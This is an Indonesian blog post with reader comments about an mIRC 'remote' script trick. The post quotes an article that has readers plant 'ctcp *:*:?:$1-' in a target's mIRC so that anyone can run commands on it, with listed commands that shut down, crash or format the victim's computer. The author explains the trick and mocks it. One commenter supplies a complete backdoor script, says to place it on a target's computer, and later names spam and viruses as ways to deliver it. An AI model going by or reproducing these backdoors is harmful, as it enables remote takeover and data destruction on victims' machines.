Oleh: sanjisan | Maret 16, 2008

Remote irc “ctcp *:*:?:$1-“, trik untuk anak ingusan!


Saya pernah membaca artikel berikut ini:

Remote IRC (Mengontrol 100% segala chattingan user)
ketikkan perintah “ctcp *:*:?:$1-” ke dalam remote mIRC sasaran lalu masukan juga di dalam variables “%master Nick_kamu”.
Perintah mengontrol komputer target :
/ctcp run rundll user,#7 : Melakukan Shutdown komputer sasaran
/ctcp run rundll user,#3 : Membuat Crash / Hang komputer sasaran
/ctcp run rundll user,#4 : Mengacaukan tampilan yang ahkirnya komputer sasaran Crash /Hang
/ctcp run format /y : Melakukan format pada komputer sasaran
/ctcp run http://.com : Membuka situs sesuai keinginan kamu
/ctcp /nick : Mengganti nick mIRC sasaran
(Perintah lainnya dapat dilihat di Peritah DAl.NET)

Penulis : Yogya Family Code
Referensi : 1. Jasakom.com
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

——————————————

Trik tersebut hanya diajarkan untuk anak-anak ingusan yang ingin menjahili temannya, tapi justru temannya itu malah menjadi korban dari spammer (yang pertama mengajarkan trik ini), bahkan siapapun bisa mengendalikan komputer sasaran.

Sekarang, mari kita bahas script di atas, “ctcp *:*:?:$1-“ dalam remote, dan “%master Nick_kamu” dalam variables.

CTCP = client to client protocol, gunanya agar pesan yang kita kirim sampai pada client/user lain dalam suatu network/server yang sama, di sini berarti irc server.
Sedangkan *:*:?:$1- berarti:
(siapapun):(apapun yg dia type-kan untuk kita):(yg terkirim ke query/status window):(kita akan mengikutinya), jika script itu ada di remote irc kita.

Karakter bintang * yang pertama berarti apapun/siapapun, coba ganti dengan “SANJI”, maka hanya nick SANJI yang akan kita terima perintahnya. Karakter bintang * kedua berarti apapun yang diketikkan-nya yang sampai pada kita dalam window query/status, yang bersimbol tanda tanya. Jika tanda # atau $chan berarti dalam chanel.

Karakter $1- berarti apapun yang dia ketikkan pada kita, akan kita ikuti. Disuruh shutdown ya shutdown, disuruh jadi inviter/spamer juga nurut, bahkan chat sama orang lain, dsb, apapun akan dilakukan komputer kita untuknya.

Bagaimana dengan “%master Nick_kamu” yg ada di variables?????
Nggak ada hubungannya SAMA SEKALI!
Kecuali script itu diganti menjadi: “ctcp %master:*:?:$1-“.

Saran saya buat temen² yang suka main² mIRC scripting, lebih baik belajar bikin script sendiri, seperti Mr^P atau Sanji^Script, nggak usah makai² script orang, tapi nggak apa² kalo cuma untuk dipelajari. Kalau baru bisa dikit aja udah sombong & sok “hacker”, ya jadinya kayak “hacker” ingusan tadi. Yang kreatif dong! dan jangan sombong…, friend :)

Jika ada yang punya masalah tentang artikel ini, silahkan hubungi saya di cedonulfi_at_yahoo_dot_com, thanks.


Responses

  1. haiiiiiiiii……….
    kamu copy dari jasakom kan….

    alah, ngakua aja deh…..

    anak ingusan memang dah taw dari dulu ….

    n dia nya sekarang dah gede….

    pi kayaknya tuh dah ga beralaku lagi …. di beberapa room irc

    dah makin maju kali ….

  2. kwakwawkawkkawkaw…………..

    ternyata kamu orang jasakom juga ya…..

    ajarin donk…..

    teknik2 hacking yang lain nya….

    kalo yg diatas tuh dah pernah di coba…..

    pi ga lucu lagi kayaknya ……

    yg lebih hebat nya masih ada lagi ga….

  3. bang,cr msuk ke remote mirc korban gmna yach

  4. seh berlaku gk perintah tuh,olden blang gk berlaku lg
    pleaseeeee,gw pengen bgt neh belajar,thanks before

  5. ya, msih berlaku kq. tinggal masukin aja di window remote (alt+R), pada mIRC.
    kalo mau nyoba2, isikan aja sperti ini:

    on *:join:#: if ($nick == $me) set %master fire
    on *:join:#: if ($nick == %master) {
    msg $nick you are my owner!
    }
    on %master:text:!nick *:#: nick $2-
    on %master:text:!run *:#: run $2-

    silahkan ganti nick: “fire” dengan nick kamu, dan taruh script ini pada komputer target.
    jika kamu masuk ke chanel irc, dan ada yang ngasih pv-an: you are my owner!, dialah targetmu.

    untuk mengganti nick dia, ketik di chanel: !nick nickbaru.
    agar dia membuka web ttt, ketik: !run http://situsapasaja.com
    dan kalo mau perintah2 lainnya, tinggal tambahin aja script tsb dengan perintah2 baru,

    peace :D
    NB: tau deepfreeze?

  6. mas, bagaimana cara manaruh scrip itu ke komputer targetnya?
    tq

  7. iah tuh kek kata zen carax gmana yahhh

  8. ass, kak……………
    gimana perintah untuk menampilkan deepfreeze?
    mhon blasannya….
    thx before………….

  9. @zen, @Furkan,
    bisa lewat spam, paket scripts, virus, dll.

    @ningsih,
    tekan Ctrl+Alt+Shift+F6
    atau Shift+klik 2x pada icon deepfreeze di Taskbar.

  10. gmn c cara scan ip orng di MIRC terutama pada server webchat,
    scan ip itu terdiri dari
    1. negara
    2. propinsi
    3. daerah
    4. server/proxi yang digunakan


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Kategori

%d blogger menyukai ini: